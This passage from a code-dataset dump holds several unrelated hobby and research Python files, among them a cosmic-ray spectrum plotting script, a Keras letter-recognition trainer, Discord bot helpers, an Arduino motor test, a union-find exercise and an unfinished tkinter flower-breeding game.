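gu = np.array([0.60, 0.70])   # upper-bound weighted utilities
print(gu / (1 + gu - gl))     # [0.5        0.60869565]
```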
logE_th = 18.75 # Compute the deviance from logE_th\n isSFR = True # True for SFRD, False for SMD\n\n #Best-fit parameters, inferred with Examples/Fit.py\n if isSFR:\n key = \"sfrd\"#solar mass / (yr.Mpc3)\n logRcut, gamma_nucl, gamma_p = 18.28, -0.36, 2.64\n E_times_k = [9.06E+45, 6.79E+45, 2.30E+46, 7.11E+45, 1.69E+45]\n unit_E_times_k = \"erg per solar mass\"\n sigma_shift_sys = 1.20\n else:\n key = \"smd\" #solar mass / Mpc3\n logRcut, gamma_nucl, gamma_p = 18.41, 0.62, 3.02\n E_times_k = [2.27E+36, 2.13E+35, 1.33E+36, 1.78E+35, 1.77E+35]\n unit_E_times_k = \"erg per solar mass per year\"\n sigma_shift_sys = 1.54\n\t\t\n ################################# Tensor ##################################\n ###########################################################################\n S_z = ts.Load_evol(file = key+\"_local.dat\", key=key)\n w_zR_nucl = sp.weight_tensor(S_z, gamma_nucl, logRcut)\n w_zR_p = sp.weight_tensor(S_z, gamma_p, logRcut)\n Tensor = ts.upload_Tensor(logRmin = logRmin)\n\n ################################## Plot ###################################\n ###########################################################################\n\n plt.rcParams.update({'font.size': 14,'legend.fontsize': 12})\n\n sp.Plot_spectrum(\tTensor, E_times_k, ts.A, ts.Z, w_zR_nucl, w_zR_p, logE_th, hadr_model, isE3dJdE= False, isRenormalized=False, ext_save=key)\n mass.Plot_Xmax(\tTensor, E_times_k, sigma_shift_sys, ts.A, ts.Z, w_zR_nucl, w_zR_p, logE_th, hadr_model, ext_save=key)\n\n plt.show()\n","repo_name":"micro-uhecr/micro_combined_fit","sub_path":"Example/Propagate.py","file_name":"Propagate.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42403999014","text":"import numpy as np\nimport os\nimport random\n\nfrom PIL import Image\nfrom PIL import ImageFilter\n\nimport tensorflow as tf\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, Activation\nfrom keras.layers import Dropout\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.utils import np_utils\n\nfrom sklearn.utils import shuffle\n\n# Data loading and augmentation\nimg_path = r'\\PATH_TO_DATASET'\nX_train = []\ny_train = []\nX_test = []\ny_test = []\n\nos.chdir(img_path)\ndirs = os.listdir()\nclass_dot = 0\nfor d in dirs:\n print(d, end=' ')\n index = 0\n os.chdir(os.path.join(img_path, d))\n \n files = os.listdir()\n for f in files:\n for way in ['original' , 'rotate+', 'rotate-', 'blur', 'blur&rotate', 'shift']:\n if way == 'original':\n img = Image.open(f)\n res_img = Image.new(\"RGB\", img.size, (255, 255, 255))\n res_img.paste(img, mask=img.split()[3])\n res_img = res_img.resize((32, 32))\n img_arr = np.array(res_img)\n \n elif way == 'rotate+':\n img = Image.open(f)\n res_img = Image.new(\"RGB\", img.size, (255, 255, 255))\n res_img.paste(img, mask=img.split()[3])\n angle = random.randint(0, 50)\n res_img = res_img.rotate(angle, fillcolor='white')\n res_img = res_img.resize((32, 32))\n img_arr = np.array(res_img)\n \n elif way == 'rotate-':\n img = Image.open(f)\n res_img = res_img.resize((32, 32))\n res_img = Image.new(\"RGB\", img.size, (255, 255, 255))\n res_img.paste(img, mask=img.split()[3])\n angle = random.randint(-50, 0)\n res_img = res_img.rotate(angle, fillcolor='white')\n res_img = res_img.resize((32, 32))\n img_arr = np.array(res_img)\n \n elif way == 'blur':\n img = Image.open(f)\n res_img = Image.new(\"RGB\", img.size, (255, 255, 255))\n res_img.paste(img, 
mask=img.split()[3])\n res_img = res_img.filter(filter=ImageFilter.GaussianBlur(0.8))\n res_img = res_img.resize((32, 32))\n img_arr = np.array(res_img)\n \n elif way == 'blur&rotate':\n img = Image.open(f)\n res_img = Image.new(\"RGB\", img.size, (255, 255, 255))\n res_img.paste(img, mask=img.split()[3])\n res_img = res_img.filter(filter=ImageFilter.GaussianBlur(0.8))\n angle = random.randint(-50, 0)\n res_img = res_img.rotate(angle, fillcolor='white')\n res_img = res_img.resize((32, 32))\n img_arr = np.array(res_img)\n \n elif way == 'shift':\n img = Image.open(f)\n res_img = Image.new(\"RGB\", img.size, (255, 255, 255))\n res_img.paste(img, mask=img.split()[3])\n res_img = res_img.rotate(0, fillcolor='white')\n horizontal, vertical = random.randint(-5, 5), random.randint(-5, 5)\n res_img = res_img.resize((32, 32))\n img_arr = np.array(res_img)\n \n if index >= round(len(files) / 100 * 85):\n X_test.append(img_arr)\n y_test.append([class_dot])\n\n else:\n X_train.append(img_arr)\n y_train.append([class_dot])\n \n index += 1\n \n class_dot += 1\n\nX_train = np.array(X_train, dtype='float32')\ny_train = np.array(y_train, dtype='uint8')\nX_test = np.array(X_test, dtype='float32')\ny_test = np.array(y_test, dtype='uint8')\n\nY_train = np_utils.to_categorical(y_train, 33)\nY_test = np_utils.to_categorical(y_test, 33)\n\nX_train = X_train / 255\nX_test, Y_test = shuffle(X_test / 255, Y_test)\n\nprint()\n\n\n# Model architecture\nmodel = Sequential()\n\nmodel.add(Conv2D(16, (3, 3), padding='same', input_shape=(32, 32, 3), activation='relu'))\nmodel.add(Conv2D(16, (3, 3), activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.1))\n\nmodel.add(Conv2D(32, (3, 3), padding='same', activation='relu'))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.3))\n\nmodel.add(Conv2D(128, (3, 3), padding='same', activation='relu'))\nmodel.add(Conv2D(256, (3, 3), activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.5))\n\nmodel.add(Flatten())\nmodel.add(Dense(1024, activation='relu'))\nmodel.add(Dense(512, activation='relu'))\nmodel.add(Dense(33, activation='softmax'))\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n \nhistory = model.fit(X_train, Y_train,\n batch_size=80,\n epochs=200,\n validation_data=(X_test, Y_test),\n shuffle=True)\n\nos.chdir(r'/PATH_TO_SAVED_MODELS')\nfilename = ''\nmodel.save_weights(f'{filename}.hdf5')\nmodel.save(f'{filename}.h5')\n","repo_name":"ansafo/CNN_RusAlph","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"72004755027","text":"#Error Handling\n\nwhile(True):\n\n try:\n age=int(input('What is your age'))\n vote=10/age\n print(age)\n #throw error\n raise ValueError('hey Cut is out')\n except ValueError:\n print(\"please enter a number\")\n continue\n except ZeroDivisionError:\n print(\"Please enter age greater than 0\")\n break\n else:\n print(\"Thank you\")\n break\n finally:\n print('ok i am finally done') # it calls no matter what\n print('Can you hear me')\n\n\n\ndef sum(num1,num2):\n try:\n return num1+num2\n except TypeError:\n print('Something is 
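In the augmentation loop above, the `'shift'` branch draws `horizontal, vertical` offsets but never applies them. A hedged sketch of the translation it presumably intended, using Pillow's affine transform (the fill color and offset range are copied from the surrounding code; the rest is an assumption):

```python
from PIL import Image
import random

img = Image.new("RGB", (48, 48), (255, 255, 255))        # stand-in image
dx, dy = random.randint(-5, 5), random.randint(-5, 5)
shifted = img.transform(img.size, Image.AFFINE,
                        (1, 0, dx, 0, 1, dy),            # output->input pixel mapping
                        fillcolor="white")
shifted = shifted.resize((32, 32))
```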
Wrong')\n\n\nprint(sum('1',2))\n","repo_name":"avdhendra/100-days-of-Python","sub_path":"Day5/Error.py","file_name":"Error.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21412960687","text":"import global_\nimport json\nimport time\n\n\ndef is_clown_admin(ctx):\n \"\"\"\n Check if a message author is a specified clown admin\n :param ctx: Discord Context object\n :return: Boolean\n \"\"\"\n admin_ids = [\n 114384475743453193, # Nick\n 114338477922975745 # Lucas\n ]\n return ctx.author.id in admin_ids\n\n\ndef get_members(guild):\n \"\"\"\n Print list of members in given server\n :param guild: Discord Guild object\n \"\"\"\n members = '\\n - '.join([member.name for member in guild.members])\n print(f'Guild Members:\\n - {members}')\n\n\ndef sort_leaderboard(guild_id):\n \"\"\"\n Sort leaderboard for given guild id by values\n :param guild_id: Guild id to sort leaderboard for\n \"\"\"\n global_.leaderboard[guild_id] = {k: v for k, v in sorted(\n global_.leaderboard[guild_id].items(), key=lambda item: item[1], reverse=True)}\n\n\ndef save_leaderboard():\n \"\"\"\n Write leaderboard to file\n \"\"\"\n with open(global_.clown_file, 'w') as out_file:\n json.dump(global_.leaderboard, out_file)\n\n\nasync def get_display_name(ctx, clown_id):\n \"\"\"\n Pull given account id's display name in server that the command was called from, from the name cache, and refresh\n cache if expired\n :param ctx: Discord Context object\n :param clown_id: Discord account ID to return display name of\n :return: Display name of given id\n \"\"\"\n guild_id = str(ctx.guild.id)\n\n # Check if guild not cached or if cache has expired, and reacquire display names if so\n cache_TTL_seconds = 600\n if guild_id not in global_.name_cache.keys() or float(global_.name_cache[guild_id][\"time\"]) + cache_TTL_seconds < time.time():\n global_.name_cache[guild_id] = {\"time\": time.time(), \"members\": {}}\n async for member in ctx.guild.fetch_members(limit=None):\n global_.name_cache[guild_id][\"members\"][str(member.id)] = member.display_name\n with open(global_.name_cache_path, 'w') as out_file:\n json.dump(global_.name_cache, out_file)\n return global_.name_cache[guild_id][\"members\"][clown_id]\n\n\ndef is_wordle_channel(channel_name):\n \"\"\"\n Check if \"wordle\" appears in channel name at all\n :param channel_name: String channel name\n :return: Bool\n \"\"\"\n return \"wordle\" in channel_name.lower()\n","repo_name":"lucassherwin/ClownBot_py","sub_path":"bot/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71121672146","text":"from NanMotor import Motor\nfrom nanpy import (ArduinoApi, SerialManager)\n\nAI1 = 7\nAI2 = 8\nPWM = 9\nstdby = 10\n\ntry:\n connection = SerialManager()\n a = ArduinoApi(connection = connection)\nexcept:\n print(\"Failed to connect to Arduino\")\n\n#Setup\n#a.pinMode(AI1, a.OUTPUT)\n#a.pinMode(AI2, a.OUTPUT)\n#a.pinMode(PWM, a.OUTPUT)\na.pinMode(stdby, a.OUTPUT)\n\nm1 = Motor(AI1, AI2, PWM)\nm1.setupMotor(a)\n\na.digitalWrite(stdby, a.HIGH)\ntry:\n while True:\n speed = input(\"Input speed: \")\n if speed == \"exit\":\n break\n m1.drive(int(speed), a)\nexcept Exception as e:\n print(e)\n\nm1.drive(0, 
a)\n","repo_name":"ZacharyRJohnson/BC-Car","sub_path":"MotorTest.py","file_name":"MotorTest.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"7813770590","text":"# Практика: Возраст\nage = abs(int(input('Введите ваш возраст: ')))\ndef activity(age):\n if age < 7:\n return 'Вы должны учиться в детском саду'\n elif age in range(8, 18):\n return 'Вы должны учиться в школе'\n elif age in range(19, 25):\n return 'Вы студент'\n else:\n return 'Вы работаете'\n\nage = activity(age)\nprint(age)\n\n# Практика: Сравнение строк\ndef two_strings(str1, str2):\n if type(str1) != str or type(str2) != str:\n return 0\n elif str1 == str2:\n return 1\n elif len(str1) > len(str2):\n return 2\n elif str2 == 'learn':\n return 3\nprint(two_strings(100, 'python')) # 0\nprint(two_strings(100, 200)) # 0\nprint(two_strings('python', 'python')) # 1\nprint(two_strings('Learn', 'py')) # 2\nprint(two_strings('py', 'learn')) # 3","repo_name":"Denvol10/lesson2_tasks","sub_path":"operator_if.py","file_name":"operator_if.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17828091765","text":"from matplotlib import transforms\nimport torch\nimport torchvision.transforms as T\nfrom torch.utils.data import DataLoader\n\nfrom .FFHQ import FFHQDataset\n\ndef sample_data(loader):\n while True:\n for batch in loader:\n yield batch\ndef get_dataloader(args, logger):\n train_transform = T.Compose([\n T.RandomHorizontalFlip(),\n T.ToTensor(),\n T.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5), inplace=True)\n ])\n train_dataset = FFHQDataset(args, logger, transform=train_transform)\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset, shuffle=True)\n train_loader = DataLoader(\n train_dataset,\n batch_size=args.batch_size,\n sampler=train_sampler,\n drop_last=True,\n num_workers=args.n_workers,\n pin_memory=True\n )\n train_loader = sample_data(train_loader)\n return train_loader\n \n","repo_name":"rlawjdghek/Generative_Models","sub_path":"GANs/StyleGAN2/datasets/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13000168538","text":"import sys\nsys.stdin = open(\"D3_5248_input.txt\", \"r\")\n\n# 이전 풀이\n# def Find_Set(x):\n# if x == P[x]:\n# return x\n# else:\n# return Find_Set(P[x])\n#\n# T = int(input())\n# for test_case in range(T):\n# N, M = map(int, input().split())\n# data = list(map(int, input().split()))\n# P = list(range(N + 1))\n# for i in range(M):\n# P[Find_Set(data[2 * i + 1])] = Find_Set(data[2 * i]) # b의 대표 원소를 a의 대표원소로 교체\n#\n# count = 0\n# for i in range(1, N + 1): # 대표원소가 자기 자신인 경우의 수\n# if P[i] == i:\n# count += 1\n# print('#{} {}'.format(test_case+1, count))\n\n\n# 새로운 풀이\ndef union(x, y):\n x = find_set(x)\n y = find_set(y)\n if rank[x] >= rank[y]:\n parent[y] = x\n else:\n parent[x] = y\n if rank[x] == rank[y]:\n rank[x] += 1\n\ndef find_set(x):\n if parent[x] == x:\n return x\n else:\n return find_set(parent[x])\n\nT = int(input())\nfor test_case in range(T):\n N, M = map(int, input().split())\n data = list(map(int, input().split()))\n parent = list(range(N + 1))\n rank = [0] * (N + 1)\n for i in range(M):\n union(data[2 * i], data[2 * i + 1])\n ans = 0\n for i in range(1, N + 1):\n if i == parent[i]:\n ans += 1\n print(\"#{} {}\".format(test_case 
+ 1, ans))","repo_name":"hongyong3/TIL","sub_path":"Algorithm/Swea/D3_5248.py","file_name":"D3_5248.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38754010713","text":"#TODO\r\n #Convert each petal to an image, create ability to overlay petals, change alpha, sat, and brightness, and change location for creation of extra petals. \r\n #https://www.tutorialspoint.com/how-can-i-vary-a-shape-s-alpha-with-tkinter\r\n #Set up heritability/Epigenetics\r\n #Grow multiple branches (that look nice)\r\n #Need to set an angle for each, then figure out how to reapply the smooth function.\r\n\r\nimport tkinter as tk\r\nfrom PIL import Image,ImageTk\r\nimport random\r\nimport math\r\nfrom statistics import mean\r\nimport pickle\r\nimport numpy as np #Not yet available\r\nroot = tk.Tk() #Master object to the application\r\n\r\n#Set DEBUG\r\nDEBUG=True\r\nDEBUG_L2=True\r\n\r\nclass Dimensions:\r\n \"\"\"This class uses the desired window dimensions to layout the overall design.\r\n Attributes:\r\n window = tuple containing the lower left coordinates, width, and height of window\r\n width = window width\r\n height = window height\r\n cnv = canvas, as above\r\n lbar_nav = navigation window, as above\r\n lbar_logo = logo image, as above\r\n lbar_gene = genes, as above\r\n lbar_ttl = title, as above\r\n Methods: \r\n layoutPlots: Dictionary of plots containing the plot name and x,y location.\r\n TODO:\r\n Write out a layout for the rest of the frames\"\"\"\r\n def __init__(self, width=1000): #Justified to lower left \r\n ratios={}\r\n for i in range(1, 8): ratios[\"gr\"+str(i)] = width*0.618**i\r\n self.window = 0, 0, width, ratios[\"gr1\"]\r\n self.width = self.window[2] \r\n self.height = self.window[3]\r\n self.cnv = ratios[\"gr2\"], self.height, ratios[\"gr1\"], ratios[\"gr1\"]\r\n self.lbar_nav = 0, 2*ratios[\"gr5\"]+ratios[\"gr4\"],ratios[\"gr2\"], ratios[\"gr2\"]\r\n self.lbar_logo = 0,0,ratios[\"gr4\"], ratios[\"gr5\"] #-ratios[\"gr2\"]+ratios[\"gr4\"]\r\n self.lbar_gene = 0, ratios[\"gr5\"],ratios[\"gr2\"],ratios[\"gr5\"]\r\n self.lbar_ttl = ratios[\"gr4\"],0, ratios[\"gr3\"], ratios[\"gr5\"] #-ratios[\"gr2\"]+ratios[\"gr4\"]\r\n def layoutAll(self):\r\n pass\r\n def layoutPlots(self): #Assumes center justified \r\n plots = {\"A\":[], \"B\":[], \"C\":[], \"D\":[], \"E\":[]}\r\n n=1 #intentionally not starting at 0\r\n for l in plots:\r\n plotx = round(n*self.cnv[2]/(len(plots)+2)) \r\n plots[l]= plotx, 0\r\n n+=1\r\n return plots\r\n \r\nclass Seed:\r\n \"\"\"This class makes an arbitrary seed\r\n Methods:\r\n __init__: Genome imported from the default seed\r\n importSeed: Genome imported from external seed\r\n randomSeed: Genome generated randomly\r\n selfSeed: Genome created from previous with slight variation. Number of variations controlled by self.heri.\r\n Attributes:\r\n location: tells me 'where' the seed is. 
Options are a plot or as a saved seed.\r\n genome: dictionary defining the key parameters used for illustrating the plant.\r\n phenome: parameters used for introducing randomness when creating the plant, and\r\n heri: parameters used for controlling mixing of parameters of multiple plants.\r\n parent1: record of the previous parent, to be used in lineage tracing later.\r\n parent2: record of the previous parent, to be used in lineage tracing later\r\n\r\n TODO:\r\n Move the list of parameters to a text doc I can call, one for each named seed variety?\r\n Can then rewrite so it searches for a given name, easier to let the user save additional named flowers.\r\n Could also then have limits parameters independent of the genome/phenome\r\n phenome will eventually introduce randomness even in cloned flowers (angle of growth, height)\r\n heri contains controls on how the genome is modified later\r\n Work on crispr & clone\r\n \"\"\"\r\n def __init__(self):\r\n self.genome = {\"flower_num\":5,\r\n \"petal_num\":4, \"petal_rad\":80.0, \"petal_xFact\":2, \"petal_line\": \"#b5e3af\", \"petal_fill\":\"#D773A2\", \"petal_linewid\":2.0, \"petal_coeff\":6,\r\n \"center_line\":\"#b2b2ff\", \"center_fill\":\"#72c6ff\", \"center_linewid\":1.0,\"center_rad\":5.0, \"center_stipple\":\"\",\r\n \"layer_num\":1, \"layer_coeff\":2.0,\r\n \"stemcolor\":\"#ABCDEF\", \"thickness\":10}\r\n self.phenome = {\"height\":0} #Filling out as needed\r\n self.heri = {\"color\":1, \"selfing\":1} #Filling out as needed\r\n self.limits = {\"petal_num\":3,\r\n \"petal_rad\": 5*(self.genome[\"center_rad\"] + self.genome[\"center_linewid\"]), \"petal_xFact\":100,\r\n \"center_rad\": round(self.genome[\"petal_rad\"]/10),\r\n \"layer_num\":0} #petal_xFact and center_rad limits are read by repairTool, so they must stay defined\r\n def importSeed(self, flowername):\r\n fn = str(flowername) + \".txt\"\r\n with open(fn, \"rb\") as file: #pickle files must be opened in binary mode\r\n flowergenome = pickle.load(file) #load from the file object, not the file name\r\n self.genome = flowergenome \r\n def randomSeed(self):\r\n for key, value in self.genome.items():\r\n newval = radiationTool(key, value)\r\n self.genome[key]=newval\r\n repairTool(self.genome, self.limits)\r\n self.parent1 = \"\"\r\n self.parent2 = \"\"\r\n def selfSeed(self):\r\n for i in range(0, self.heri[\"selfing\"]):\r\n key, value = random.choice(list(self.genome.items())) #Add a way to have a chance of no change.\r\n newval = radiationTool(key, value)\r\n self.genome[key] = newval\r\n self.parent1 = self #This doesn't seem like it would work: parent1 aliases the seed itself, so later mutations also rewrite the recorded parent; a snapshot such as copy.deepcopy(self) would be needed. 
Ask for advice.\r\n self.parent2 = self\r\n def breedSeed(self, secondSeed):\r\n newgenome = {} #a dict, like self.genome, so keyed assignment works\r\n for key, value in self.genome.items():\r\n geneP1 = value\r\n geneP2 = secondSeed.genome[key] #genome values are scalars, so compare them directly rather than zipping\r\n if isinstance(geneP1, bool): #bool must be tested before int, since bool is a subclass of int\r\n newval = random.choice([geneP1, geneP2])\r\n elif isinstance(geneP1, int):\r\n newval = random.choice([geneP1, geneP2, round((geneP1 + geneP2)/2), round(random.gauss(mean([geneP1, geneP2]), 1))])\r\n elif isinstance(geneP1, float):\r\n newval = random.weibullvariate(round((geneP1 + geneP2)/2), 1)\r\n newval = float(abs(newval))\r\n else:\r\n newval = create_Colors(start=random.choice([geneP1, geneP2])) #start from one parent's color and mutate it\r\n newgenome[key]=newval\r\n self.genome = newgenome\r\n self.parent1 = self\r\n self.parent2 = secondSeed\r\n def crisprSeed(self):\r\n pass\r\n def cloneSeed(self):\r\n self.parent1 = self #This doesn't seem like it would work\r\n self.parent2 = self\r\n\r\nclass Plant():\r\n \"\"\"This class draws a plant grown from a seed\r\n Methods:\r\n __init__: sets location of the flower\r\n create_Circle: Draws flower center\r\n create_Petals: Draws the petals\r\n create_Flowers: Uses Circle and petals\r\n create_Nodes: Creates segments within a stem for placement of flowers, additional stems\r\n create_Stems: Draws the full stem, interconnecting the nodes\r\n Attributes:\r\n location: Should be a plot\"\"\"\r\n def __init__(self, seed, dimensions, canvas):\r\n self.seed = seed\r\n self.dimensions = dimensions\r\n self.canvas = canvas\r\n def create_Circle(self, x, y, r, **kwargs):\r\n return self.canvas.create_oval(x-r, y-r, x+r, y+r, **kwargs)\r\n def create_Petals(self, x, y, petal_num, radius, xFactor, coefficient, **kwargs):\r\n points = []\r\n for degrees in range(0, 360-xFactor):\r\n radians = math.radians(degrees)\r\n distance = math.sin(radians * petal_num) * radius\r\n points.append(x+math.cos(coefficient*radians) * distance)\r\n points.append(y+math.sin(coefficient*radians) * distance)\r\n return self.canvas.create_polygon(points,smooth=0, **kwargs)\r\n def create_Flowers(self, bud_x, bud_y, genes):\r\n for l in range(genes[\"layer_num\"]):\r\n self.create_Petals(bud_x, bud_y, \r\n petal_num=genes[\"petal_num\"], radius=genes[\"petal_rad\"], xFactor=genes[\"petal_xFact\"], coefficient=genes[\"petal_coeff\"], \r\n fill=genes[\"petal_fill\"], outline=genes[\"petal_line\"], width=genes[\"petal_linewid\"])\r\n self.create_Circle(bud_x, bud_y, r=genes[\"center_rad\"],\r\n fill=genes[\"center_fill\"], outline=genes[\"center_line\"], \r\n width=genes[\"center_linewid\"]) \r\n def create_Nodes(self, x1, y1, flower_num, angle, length):\r\n x2 = x1 + length\r\n y2 = math.tan(angle)*(x2-x1)+y1 \r\n xnode = np.linspace(x1, x2, flower_num, dtype=int)\r\n ynode = np.linspace(y1, y2, flower_num, dtype=int)\r\n nodes = set(zip(xnode, ynode))\r\n return nodes\r\n\r\n def create_Stems(self, base_x, base_y, genes):\r\n phen_angle = random.weibullvariate(0, 1)#Add Stem Angle: genes[\"stem_angle\"].\r\n phen_length = random.weibullvariate(50, 1)# Add Length\r\n mainstem = self.create_Nodes(base_x, base_y, genes[\"flower_num\"], phen_angle, phen_length)\r\n print(\"mainstem: \", mainstem, '\\n')\r\n self.canvas.create_line(base_x, base_y, *max(mainstem),\r\n fill=genes[\"stemcolor\"], width=genes[\"thickness\"], smooth=False)\r\n \r\n for node in mainstem:\r\n x1 = node[0]\r\n y1 = node[1]\r\n print(\"coordinates: \", x1, y1, \"\\n\")\r\n branch = self.create_Nodes(x1, y1, genes[\"flower_num\"], phen_angle+30, phen_length)\r\n print(\"branch\", branch, \"\\n\")\r\n self.canvas.create_line(x1, y1, *max(branch), #unpack the farthest node: create_line cannot flatten a set\r\n 
fill=genes[\"stemcolor\"], width=genes[\"thickness\"], smooth=False)\r\n self.canvas.create_Flowers(max(branch), genes)\r\n #\r\n #\r\n '''if genes[\"branch_alt\"]==False:\r\n branch = create_Nodes(node, 3, phen_angle-30, 10) \r\n self.canvas.create_line(node,branch,\r\n fill=genes[\"stemcolor\"], width=genes[\"thickness\"], smooth=False)\r\n self.canvas.create_Flowers(max(branch), genes)'''\r\n\r\n \r\n\r\n'''In the process of rewriting the 'nodes' element:\r\nCurrently Line A is drawn between the base point and a number of nodes equal to the flower number. The nodes are a random point between the base and every bud. Eg, a one bud flower will have one node between the base and bud. (???).\r\nCurrently Line B is drawn between the random node points and each bud at that location.\r\nLine A should be drawn between the base point and the primary bud location. Only the first bud location is assigned by garden.\r\nLine B should be drawn between nodes along the length of Line A and a given Bud (generated as part of stem creation)\r\nEventually all phen variations will be an easy pass, not repeated in code\r\n'''\r\n\r\n''' def create_Branches(): #write this first, then come back to fix nodes\r\n if genes[\"centralized\"]==True\r\n #next nodes radiate out from x2 y2.\r\n #Needed Varaibles = length, max angle, number of nodes (will change current use case)\r\n elif genes[\"alternating\"]==True\r\n #Next nodes are spaced alternately along the length of the first line\r\n \r\n else\r\n'''\r\n \r\n\r\n\r\nclass Garden():\r\n \"\"\"This class makes the garden background and buttons for the canvas\r\n Methods:\r\n __init__: sets location of the flower\r\n create_Dirt: Draws the buttons that flowers grow 'from'\r\n create_Background: Draws the background\r\n create_Planting: Places a plant in a plot\r\n create_EmptyGarden: Draws just the background\r\n create_FullGarden: Draws the background and puts plants in all plots\r\n Attributes:\r\n TODO:\r\n Create other background options\r\n \"\"\"\r\n def __init__(self, dimensions, canvas):\r\n self.dimensions = dimensions\r\n self.canvas = canvas \r\n def create_Dirt(self, base_x, base_y):\r\n image=Image.open('./dirt4.png')\r\n img=image.resize((80, 40))\r\n dirt = ImageTk.PhotoImage(img) \r\n dirtbutton=tk.Button(canvas, image=dirt, bg='#d0e0e3', fg=None, bd=0)\r\n dirtbutton.place(x= base_x, y=base_y-40)\r\n dirt.image = dirt #Cannot delete because of garbage garbaging\r\n def create_Background(self):\r\n pass\r\n #bg = ImageTk.PhotoImage(file = \"./flowerbg_2.png\")\r\n #canvas.create_image(0,0, image = bg, anchor=tk.NW)\r\n #bg.image = bg #Cannot delete because of garbage garbaging\r\n def grow_EmptyGarden(self): \r\n canvas.delete('all')\r\n self.create_Background()\r\n plots = self.dimensions.layoutPlots() #Dimensions.layoutPlots(self.dimensions)\r\n for plot in plots:\r\n base_x = plots[plot][0]\r\n base_y = plots[plot][1]\r\n self.create_Dirt(base_x, base_y) \r\n def grow_FullGarden(self): \r\n canvas.delete('all')\r\n self.create_Background()\r\n plots = self.dimensions.layoutPlots()\r\n for plot in plots:\r\n try:\r\n seed = Seed()\r\n newplant = Plant(seed.randomSeed(), self.dimensions, self.canvas)\r\n except:\r\n newplant = Plant(seed, self.dimensions, self.canvas) #Figure out when except actually triggered\r\n base_x = plots[plot][0]\r\n base_y = dimensions.height - plots[plot][1]\r\n bud_x = [random.triangular(base_x-(self.dimensions.cnv[2]/7),base_x+(self.dimensions.cnv[2]/7), base_x) for i in range(0, seed.genome[\"flower_num\"]) ]\r\n 
bud_y = [random.triangular(self.dimensions.cnv[3]-(self.dimensions.cnv[3]/7),0+(self.dimensions.cnv[3]/7),0+(2*self.dimensions.cnv[3]/7)) for i in range(0, seed.genome[\"flower_num\"]) ]\r\n# print(type(base_x));print(type(base_y));print(type(bud_x));print(type(bud_y))\r\n newplant.create_Stems(base_x, base_y, seed.genome)\r\n '''for i in range(seed.genome[\"flower_num\"]):\r\n newplant.create_Flowers(bud_x[i], bud_y[i], seed.genome)'''\r\n self.create_Dirt(base_x, base_y)\r\n\r\ndef radiationTool(key, value):\r\n \"\"\"This function randomizes the gene it is given\r\n Parameters:\r\n key: a given gene name\r\n value: the value for that gene parameter\r\n Outputs\r\n The updated new value\"\"\"\r\n if isinstance(value, bool): #bool must be tested before int, since bool is a subclass of int\r\n newval=random.choice([True, False])\r\n elif isinstance(value, int):\r\n newval=random.weibullvariate(value, 1)\r\n newval=math.ceil(newval)\r\n newval=int(abs(newval))\r\n elif isinstance(value, float):\r\n newval=random.weibullvariate(value, 1)\r\n newval=float(abs(newval))\r\n elif isinstance(value, str): \r\n newval=create_Colors() #a bare hex string, not a list, so tkinter can use it directly \r\n return newval\r\n\r\ndef repairTool(genome, limits):\r\n \"\"\"This function sets limits on the genome it is given\r\n Parameters:\r\n genome: the genome dictionary to repair\r\n limits: the limit values for the constrained genes\r\n Outputs\r\n The updated genome\"\"\"\r\n while genome[\"petal_num\"] < limits[\"petal_num\"]: \r\n genome[\"petal_num\"]+= random.randint(1, 3)\r\n while genome[\"petal_xFact\"] > limits[\"petal_xFact\"]: \r\n genome[\"petal_xFact\"]-= random.randint(1, 30)\r\n while genome[\"center_rad\"] < limits[\"center_rad\"]:\r\n genome[\"center_rad\"]+= random.randint(1, 40)\r\n while genome[\"layer_num\"] <=limits[\"layer_num\"]:\r\n genome[\"layer_num\"]+= random.randint(1, 2)\r\n genome[\"stemcolor\"]=make_Green(genome[\"stemcolor\"])\r\n genome[\"center_rad\"]=limits[\"center_rad\"] #Why did I go with such a strict option?\r\n return genome\r\n\r\n#def crisprTool(genome, key, guide):\r\n\r\ndef create_Colors(start='#FFFFFF', herit=10):\r\n \"\"\"Randomly create a new hex style number or update an old one proportional to heritability. If no initial hex is given, a completely random color is provided.\r\n Parameters:\r\n start: initial value for hex. Default is white.\r\n herit: Number of replacements. 
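(Added usage example, not in the original docstring: create_Colors('#00FF00', herit=2) performs two random single-digit replacements among the six hex digits and never touches the leading '#'.) 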
